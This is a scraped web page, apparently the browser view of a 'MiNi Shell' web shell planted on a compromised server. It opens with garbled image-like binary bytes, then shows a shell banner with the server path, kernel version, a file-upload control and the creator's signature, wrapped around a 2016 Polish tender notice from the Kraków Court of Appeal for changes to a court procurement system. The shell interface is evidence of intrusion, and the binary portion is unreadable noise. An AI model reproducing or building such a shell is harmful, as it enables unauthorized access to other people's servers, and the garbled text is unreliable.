JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160412/38593-N-2016.html

<p class="kh_header"><b>Kraków: Rozbudowa i modyfikacja Centralnego Systemu Zakupów dla sądownictwa powszechnego</b><br>
<b>Numer ogłoszenia: 38593 - 2016; data zamieszczenia: 12.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Apelacyjny w Krakowie , ul. Przy Rondzie 3, 31-547 Kraków, woj. małopolskie, tel. 12 41 75 423, faks 12 41 75 426.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.sa.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i modyfikacja Centralnego Systemu Zakupów dla sądownictwa powszechnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.Weryfikacja istniejących interfejsów integracyjnych CSZ - ZSRK (Centralny System Zakupów - Zintegrowany System Rachunkowości i Kadr) w zakresie obsługi podstawowych ścieżek zakupowych:
a.budżetowej 
b.logistycznej;
2.Dostosowanie interfejsów obsługujących powyższe ścieżki do wymagań systemu ZSRK zgodnie ze zmianami 
na rok 2016:
a.Dla ścieżki budżetowej:
I.Wstępne unieruchomienie
II.Unieruchomienie
III.Faktura FI w systemie SAP
b.Dla ścieżki logistycznej:
I.Wstępne unieruchomienie
II.Rezerwacja FM w systemie SAP
III.Zamówienie MM w systemie SAP
IV.PZ w systemie SAP
V.Faktura MM w systemie SAP;
3.Implementacja koniecznych zmian w funkcjonalności CSZ wymaganych dla prawidłowego działania wyżej wymienionych interfejsów w tym:
a.Przypisanie rodzaju ścieżki zakupowej do cyklu zamówieniowego, z uwzględnieniem jej powiązania 
ze sposobami realizacji zakupów przewidzianymi w CSZ, wskazywanymi przy rejestracji umów
b.Rozszerzenie listy słowników z ZSRK przechowywanych po stronie CSZ, w tym m.in. o:
I.Konto księgi głównej
II.Typ MPK (Miejsce Powstawania Kosztów)
III.MPK w relacji do jednostek
c.Wprowadzenie możliwości kwalifikowania pozycji zapotrzebowań, specyfikacji, umów, faktur i innych dokumentów wg MPK. Kwalifikowanie następować będzie na podstawie przypisania w relacji 1:1 typu MPK do produktu. 
d.Umożliwienie wykorzystania w interfejsach komunikacyjnych wymaganych przez ZSRK jednostek ceny
e.Wprowadzenie innych zmian w interfejsie użytkownika CSZ, w tym:
I.Dodanie w interfejsie użytkownika (UI) informacji o identyfikatorach dokumentów z ZSRK (otrzymanych zwrotnie po ich utworzeniu)
II.Udostępnienie w UI komunikatów błędów otrzymywanych z ZSRK
III.Dodanie pola edytowalnego w słowniku magazynów, umożliwiającego wpisanie unikalnego identyfikatora magazynu z ZSRK 
IV.Dodanie w UI pól umożliwiających edycję parametrów przekazywanych do ZSRK np. typ dokumentu, tekst nagłówka, rodzaju dokumentu zaopatrzeniowego z możliwością ustawienia wartości domyślnych 
V.Dodanie nowego pola opis na fakturze
VI.Rozszerzenie i modyfikacja systemu uprawnień wynikająca z wprowadzenie nowych funkcjonalności;
4.Uruchomienie interfejsów na środowisku testowym;
5.Przeprowadzenie testów wg założonych scenariuszy;
6.Przeniesienie zaktualizowanych interfejsów i wprowadzonych zmian w CSZ na system produkcyjny;
7.Aktualizacja dokumentacji:
a.Dokumentacja techniczna interfejsów integracyjnych
b.Dokumentacja użytkownika CSZ;
8.Etapy zamówienia (trzy etapy):
Etap pierwszy:
a.Przygotowanie dokumentacji w formie założeń projektowych dla zmodyfikowanych interfejsów komunikacyjnych
b.Zmiany w interfejsie CSZ opisane w pkt. 3 a, b, c
Etap drugi:
c.Opracowanie i uruchomienie interfejsów na środowisku testowym, wymaganych do obsługi ścieżki budżetowej 
d.Opracowanie scenariuszy testowych
Etap trzeci:
e.Opracowanie i uruchomienie interfejsów na środowisku testowym, wymaganych do obsługi ścieżki logistycznej
f.Przeprowadzenie testów wg przygotowanych scenariuszy
g.Dostarczenie dokumentacji opisanej w pkt. 7
h.Wykonanie pozostałych zmian w CSZ opisanych w pkt 3.
i.Uruchomienie interfejsów w środowisku produkcyjnym
9.Zamawiający przewiduje możliwość świadczenia usług rozbudowy i modyfikacji Centralnego Systemu Zakupów dla sądownictwa powszechnego w maksymalnej łącznej liczbie 240 godzin w terminie do 210 dni od dnia podpisania umowy.
10.Opis przedmiotu zamówienia zawarty został w załączniku nr 7 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 210.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA. a)Wykonawca spełni powyższy warunek poprzez wykazanie, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zostały wykonane co najmniej dwie usługi - zawierające łącznie wymienione niżej trzy rodzaje zakresów prac 
(lit. a, lit. b, lit. c), przy czym każda z pojedynczych usług może zawierać od jednego do trzech zakresów prac:
a)usługa polegająca na projektowaniu, budowie i świadczeniu usług wsparcia systemu informatycznego obsługującego procesy logistyczne w zakresie zamówień (zakupów), w tym: obsługi zamówień, reklamacji i zwrotów dla minimum 500 zamówień w miesiącu, będącego zintegrowanym z systemami dostawców towarów, w którym łączna wartość tej usługi (nie obejmująca dostaw licencji i sprzętu) wynosiła przynajmniej 500 000 zł brutto;
b)usługa, polegającą na wdrożeniu systemu rozproszonego w architekturze centralnej w co najmniej 40 lokalizacjach, gdzie platforma serwerowa i oprogramowanie aplikacyjne zostało zainstalowane w jednej lokalizacji, a funkcjonalność aplikacji dostępna jest przez przeglądarki internetowe w pozostałych lokalizacjach; przetwarzającego w czasie rzeczywistym co najmniej 100 zapytań na sekundę,
c)usługa, o wartości nie mniejszej niż 200 000 zł brutto, polegająca na integracji systemu teleinformatycznego z systemem SAP.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej następującymi osobami, które będą osobiście wykonywały przedmiot zamówienia, w tym
a)Kierownik Projektu, o następujących minimalnych kwalifikacjach i doświadczeniu:
- kwalifikacje w zakresie zarządzania przedsięwzięciami informatycznymi potwierdzone posiadanym certyfikatem PRINCE2 (Practitioner Certificate) lub certyfikatem PMP (Project Management Professional) lub równoważnym, wydanym przez uprawniony podmiot na podstawie zdanego egzaminu. Jako równoważne Zamawiający uzna certyfikaty potwierdzające wiedzę w zakresie właściwym dla wskazanego certyfikatu. Jako równoważne Zamawiający uzna w szczególności certyfikaty przyznawane przez Project Management Institute (PMI) co najmniej na poziomie Project Management Professional (PMP) lub certyfikaty nadawane przez International Project Management Association (IPMA) co najmniej na poziomie C; 
i
-  co najmniej 5 lat doświadczenia w pełnieniu funkcji Kierownika Projektu w zakresie prowadzenia projektów informatycznych i wdrażania systemów aplikacyjnych; w tym kierowanie co najmniej jednym projektem wdrożeniowym prowadzonym w organizacji wielooddziałowej w minimum 50 lokalizacjach;
i 
- co najmniej jeden zrealizowany projekt polegający na projektowaniu, budowie i świadczeniu usług wsparcia systemu informatycznego obsługującego procesy logistyczne w zakresie zamówień (zakupów) w roli Kierownika Projektu.
b)Główny Analityk o następujących minimalnych kwalifikacjach i doświadczeniu:
- Certificate of Basic BPMN Competence;
- MODELING BUSINESS PROCESSES USING BPMN 2.0;
- PROCESS SIMULATION MODELS With BPMN 2.0;
- IIBA (International Institute of Business Analysis) - CCBA (Certification of Competency in Business Analysis);
- udział w roli głównego analityka w minimum 2 projektach rozproszonych systemów obsługujących procesy logistyczne w zakresie zamówień (zakupów), w tym obsługa zamówień, reklamacji i zwrotów.
c)	Główny Architekt o następujących minimalnych kwalifikacjach i doświadczeniu:
- Certyfikat TOGAF 9;
- udział w roli głównego architekta w minimum 2 projektach rozproszonych systemów obsługujących  procesy logistyczne w zakresie zamówień (zakupów), w tym obsługa zamówień, reklamacji i zwrotów.
d)Kierownik Testów o następujących minimalnych kwalifikacjach i doświadczeniu:
- ISTQB (International Software Testing Qualifictions Board);
- udział w roli specjalisty ds. jakości (kierownika testów) w minimum 2 projektach informatycznych.
e)Certyfikowany Specjalista w zakresie technologii warstwy aplikacji i prezentacji SAP o następujących minimalnych kwalifikacjach i doświadczeniu (możliwość świadczenia usługi przez dwóch specjalistów):
- certyfikacja produktowa firmy SAP AG w zakresie modułu FM;
- certyfikacja produktowa firmy SAP AG w zakresie modułu MM;
- udział w roli konsultanta lub programisty technologii warstwy aplikacji i prezentacji SAP w co najmniej 1 projekcie w zakresie modułu FM 
- udział w roli konsultanta lub programisty technologii warstwy aplikacji i prezentacji SAP w co najmniej 
1 projekcie w zakresie modułu MM 
f)	Specjalista integracji z systemem księgowym:
- w ciągu ostatnich 5 lat brał udział w charakterze analityka lub projektanta w realizacji co najmniej jednego projektu zaprojektowania i jednego projektu wykonania systemu finansowo-księgowego - posiadający znajomość przepisów o rachunkowości;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2013 r., poz. 907 z późn. zm.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oferta cenowa zgodnie z rozdziałem I pkt 3 SIWZ, ( załącznik nr 1 do SIWZ ) 2) Odpowiednie pełnomocnictwa (tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie 2 SIWZ lub w przypadku składania oferty wspólnej - rozdział III pkt 1 siwz), 3) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - terminy wykonania - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krakow.sa.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Apelacyjny w Krakowie, 31-547 Kraków, ul. Przy Rondzie 3, pok. 3A 04 (IIIp.)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2016 godzina 10:00, miejsce: Sąd Apelacyjny w Krakowie, 31-547 Kraków, ul. Przy Rondzie 3, pok. 3A 04 (IIIp.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com